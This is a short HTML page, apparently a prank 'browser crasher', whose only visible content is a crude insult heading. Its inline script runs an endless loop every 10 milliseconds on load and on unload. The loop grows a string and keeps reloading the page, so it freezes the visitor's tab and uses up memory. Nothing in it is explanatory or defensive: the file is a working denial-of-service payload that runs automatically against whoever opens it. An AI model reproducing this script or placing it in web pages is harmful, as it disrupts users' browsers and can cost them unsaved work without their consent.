<!DOCTYPE html>
<html>
    <body>
        <script>
            function handler(){
                a = "a";
                b = false;
                while(true){
                    if(b){
                        b = false;
                    }else{
                        b = true;
                    }
                    a += "a";
                    window.location.reload();
                }
            }
            window.setInterval(handler, 10)
            window.onbeforeunload = function() {
                window.setInterval(handler, 10);
            }
            window.onload = function() {
                window.setInterval(handler, 10);
            }
        </script>
        <h1 style="color: blue; background-color: black">Ur Mum Gey</h1>
    </body>
</html>
